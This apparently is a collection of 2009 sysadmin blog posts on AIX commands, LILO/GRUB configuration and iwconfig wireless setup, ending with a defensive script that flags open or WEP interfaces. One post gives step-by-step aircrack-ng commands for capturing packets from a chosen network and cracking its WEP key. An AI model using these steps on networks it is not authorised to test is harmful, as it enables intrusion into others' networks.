Wednesday, September 23, 2009

Aix Tips

User administration on Aix

mkuser username
To add users

Thursday, August 6, 2009

WAP Security Crack

Hack Wireless WEP Network


WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. Wikipedia

It’s fairly easy to crack a WEP-encrypted wireless network. In fact, WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.

Install aircrack-ng on Debian Etch with:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:

sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with the specific channel number to collect packets faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVs, and then try to do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.

Wednesday, August 5, 2009

Aix Commands

Aix Useful Commands


List the licensed program products: lslpp -L
List the defined devices: lsdev -C -H
List the disk drives on the system: lsdev -Cc disk
List the memory on the system: lsdev -Cc memory (MCA)
List the memory on the system: lsattr -El sys0 -a realmem (PCI), lsattr -El mem0
List system resources: lsattr -EHl sys0
List the VPD (Vital Product Data): lscfg -v
Document the tty setup: lscfg or smit screen capture F8
Document the print queues: qchk -A
Document disk Physical Volumes (PVs): lspv
Document Logical Volumes (LVs): lslv
Document Volume Groups (long list): lsvg -l vgname
Document Physical Volumes (long list): lspv -l pvname
Document File Systems: lsfs fsname, /etc/filesystems
Document disk allocation: df
Document mounted file systems: mount
Document paging space (70 - 30 rule): lsps -a
Document paging space activation: /etc/swapspaces
Document users on the system: /etc/passwd, lsuser -a id home ALL
Document users attributes: /etc/security/user
Document users limits: /etc/security/limits
Document users environments: /etc/security/environ
Document login settings (login herald): /etc/security/login.cfg
Document valid group attributes: /etc/group, lsgroup ALL
Document system wide profile: /etc/profile
Document system wide environment: /etc/environment
Document cron jobs: /var/spool/cron/crontabs/*
Document skulker changes if used: /usr/sbin/skulker
Document system startup file: /etc/inittab
Document the hostnames: /etc/hosts
Document network printing: /etc/hosts.lpd
Document remote login host authority: /etc/hosts.equiv

Wednesday, July 22, 2009

GRUB/LILO BOOT LOADER

A boot loader is the program that sits in your computer's Master Boot Record, or MBR, or at the beginning of your bootable partition. Every operating system uses a boot loader of some sort; without it, the computer would not be able to boot into your operating system.


LILO
LILO (current version is 21.7.5) was the first Linux boot loader, and its name simply stands for “LInux LOader.” You will never need to download it because all Linux distributions come with it.

Let's take a look at an example lilo.conf file:
boot=/dev/hde
map=/boot/map
install=/boot/boot.b
vga=ext
default=linux
lba32
prompt
timeout=50
password=secret
restricted
message=/boot/message-graphic
menu-scheme=wb:bw:wb:bw
image=/boot/vmlinuz
    label=linux
    root=/dev/hde1
    initrd=/boot/initrd.img
    append=" hdb=ide-scsi"
    read-only
image=/boot/vmlinuz
    label=failsafe
    root=/dev/hde1
    initrd=/boot/initrd.img
    append=" hdb=ide-scsi failsafe"
    read-only
other=/dev/fd0
    label=floppy
    unsafe
image=/boot/vmlinuz-2.2
    label=linux2.2
    root=/dev/hde1
    initrd=/boot/initrd-2.2.img
    append=" hdb=ide-scsi"
    read-only

GRUB

GRUB is a newer boot loader that at one point was a little more advanced than LILO. Its name stands for GRand Unified Bootloader. I find GRUB a little more difficult to use than LILO, and it is no longer any more advanced than LILO is. It offered a graphical boot menu before LILO did, and it was a text ANSI-based menu at that. Now, LILO offers a true graphical boot menu and is just as powerful, if not more so, than GRUB.

GRUB works in a very different way. It comes with an interactive script called grub-install, which is how you should initially configure it, unless you really know what you're doing. You will need to have GRUB installed first; most distributions also come with GRUB, but if not, you can download it from the GNU.org site.

To begin the configuration, issue the following as root:
grub-install /dev/hde

where /dev/hde is the primary drive to boot from. Again, /dev/hde is the primary ATA100 drive, but if you use ATA33 or ATA66 drives, be sure to use /dev/hda.

Once grub-install runs for the first time, it will create a file called /boot/grub/device.map and will print the contents of that file to the screen. This will list all of the drive devices on your system, including your floppy drive. After running grub-install here, my /boot/grub/device.map file looked like Table A.

Table A: The device.map file
(fd0) /dev/fd0
(hd0) /dev/hde
(hd1) /dev/hdf
(hd2) /dev/hdg

If this looks correct, you will then need to create the GRUB configuration file: /boot/grub/menu.lst



Example configuration file
# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You have a /boot partition. This means that
# all kernel and initrd paths are relative to /boot/, eg.
# root (hd0,0)
# kernel /vmlinuz-version ro root=/dev/rootvg/root_lv
# initrd /initrd-version.img
#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title Red Hat Enterprise Linux AS (2.6.9-67.EL)
    root (hd0,0)
    kernel /vmlinuz-2.6.9-67.EL ro root=/dev/rootvg/root_lv rhgb quiet
    initrd /initrd-2.6.9-67.EL.img



Monday, July 20, 2009

Wifi Configuration in redhat/suse linux



Iwconfig, like ifconfig, is a wireless interface configuration utility in Linux. It is used to set the parameters of the network interface which are specific to the wireless operation. Iwconfig may also be used to display the parameters and the wireless statistics. iwconfig extracts this information from the /proc/net/wireless file.

Step1: When you run the command "iwconfig" you get the following output


lo no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11abg ESSID:”xxxxxxxx”
Mode:Managed Frequency:2.437 GHz Access Point: 00:11:22:33:44:55
Bit Rate=54 Mb/s Tx-Power=15 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx [2] Security mode:open
Power Management:off
Link Quality=96/100 Signal level:-32 dBm Noise level=-69 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0



Step2: Alternatively, you can run the command with an interface name like the following:

Localhost:~ # iwconfig wlan0
wlan0 IEEE 802.11abg ESSID:”xxxxxxxx”
Mode:Managed Frequency:2.437 GHz Access Point: 00:11:22:33:44:55
Bit Rate=54 Mb/s Tx-Power=15 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx-xxxx [2] Security mode:open
Power Management:off
Link Quality=96/100 Signal level:-32 dBm Noise level=-69 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Set operation Mode

The Wireless interface can be set to one of the following different modes which impacts how the device operates:

managed – Node is a client connecting to an Access Point
master – Node acts as an Access Point
secondary – Node acts as a Secondary to a master Access point
ad-hoc – Operates in a One to One Ad-hoc connection to another Wireless device
monitor – Doesn’t connect to any Wireless network but sits and listens on all the packets on a frequency
repeater – Forwards packets between wireless nodes

The mode can be set as follows:

Step3

localhost:~ # iwconfig <interface> mode <mode>

For example

localhost :~ # iwconfig wlan0 mode managed

The above sets the interface wlan0 in managed mode.

Set ESSID for Network

Once the mode is set, we can go ahead and set the ESSID of the network to which we connect.

The ESSID can be set as

Step4

localhost:~ # iwconfig <interface> essid <essid>

For instance,

localhost:~ # iwconfig wlan0 essid "ABC-WIFI"

Set Wireless Key (WEP)

We can set the WEP Encryption key (64bit or 128 bit)

Step5

localhost:~ # iwconfig <interface> key <key>

For example,

localhost :~ # iwconfig wlan0 key 1234-5678-9101-1213

To disable WEP key

localhost :~ # iwconfig wlan0 key off

or to connect to an open network

localhost :~ # iwconfig wlan0 key open

Setting Channel which the interface uses

localhost:~ # iwconfig wlan0 channel <channel>

For example,

localhost:~ # iwconfig wlan0 channel auto

or

localhost :~ # iwconfig wlan0 channel 11

to use channel 11.

There are other options that can be set using the iwconfig command. These can be found in the help output or the man page:

localhost:~ # iwconfig --help
Usage: iwconfig [interface]
interface essid {NNN|any|on|off}
interface mode {managed|ad-hoc|master|…}
interface freq N.NNN[k|M|G]
interface channel N
interface bit {N[k|M|G]|auto|fixed}
interface rate {N[k|M|G]|auto|fixed}
interface enc {NNNN-NNNN|off}
interface key {NNNN-NNNN|off}
interface power {period N|timeout N|saving N|off}
interface nickname NNN
interface nwid {NN|on|off}
interface ap {N|off|auto}
interface txpower {NmW|NdBm|off|auto}
interface sens N
interface retry {limit N|lifetime N}
interface rts {N|auto|fixed|off}
interface frag {N|auto|fixed|off}
interface modulation {11g|11a|CCK|OFDMg|…}
interface commit
Check man pages for more details.

Let’s use the above for instance to quickly connect to a Wireless network as follows

localhost:~ # iwconfig wlan0 mode managed
localhost:~ # iwconfig wlan0 essid "ABC-WIFI"
localhost:~ # iwconfig wlan0 key 1111-2222-3333-4444
localhost:~ # iwconfig wlan0 channel auto

The above sets the wlan0 interface to managed mode so it can connect to a Wireless Access point. We then configure an ESSID of a network and then a related key and an auto channel selection.

NOTE: using WEP security is not secure and can be cracked in minutes. We’ll soon cover the use of WPA/WPA2 for stronger protection from hackers.
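
To act on the note above, here is an added example (not part of the original post) that reads iwconfig output and flags interfaces whose "Encryption key" field is off or holds a WEP-sized key, meaning 10 or 26 hex digits for 64-bit and 128-bit WEP. The function names, verdict labels and sample output are constructed for illustration, and judging by key length is a heuristic, since iwconfig does not report whether WPA is in use.

```shell
# Added example: flag interfaces that iwconfig reports as unencrypted or WEP-keyed.
# Heuristic (assumption): iwconfig shows no WPA state, so keys are judged by length.
audit_iwconfig() {
    # Reads iwconfig output on stdin; prints "<iface> <verdict>" per wireless interface.
    awk '
        # Interface blocks start in column 0; continuation lines are indented.
        /^[^ \t]/ {
            iface = $1
            wireless = ($0 !~ /no wireless extensions/)
        }
        wireless && match($0, /Encryption key:[^ \t]+/) {
            key = substr($0, RSTART + 15, RLENGTH - 15)  # text after "Encryption key:"
            hex = key
            gsub(/-/, "", hex)                           # 1234-5678-90 becomes 1234567890
            if (key == "off")
                verdict = "OPEN"      # no link-layer encryption
            else if (hex ~ /^[0-9A-Fa-f]+$/ && length(hex) == 10)
                verdict = "WEP-64"    # 40-bit secret + 24-bit IV
            else if (hex ~ /^[0-9A-Fa-f]+$/ && length(hex) == 26)
                verdict = "WEP-128"   # 104-bit secret + 24-bit IV
            else
                verdict = "OTHER"     # not a WEP-sized key; check the supplicant config
            print iface, verdict
        }
    '
}

# Constructed sample in the layout iwconfig prints (not captured from a live system).
sample_iwconfig() {
    cat <<'EOF'
lo        no wireless extensions.

wlan0     IEEE 802.11abg  ESSID:"ABC-WIFI"
          Mode:Managed  Frequency:2.437 GHz  Access Point: 00:11:22:33:44:55
          Encryption key:1234-5678-90   Security mode:open

wlan1     IEEE 802.11bg  ESSID:"GUEST"
          Mode:Managed  Frequency:2.462 GHz  Access Point: 00:11:22:33:44:66
          Encryption key:off

wlan2     IEEE 802.11bg  ESSID:"LAB"
          Encryption key:1234-5678-9012-3456-7890-1234-56   Security mode:restricted
EOF
}

sample_iwconfig | audit_iwconfig
```

On a live system, pipe the real output in with "iwconfig 2>/dev/null | audit_iwconfig" and move any interface reported as OPEN or WEP to WPA2.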

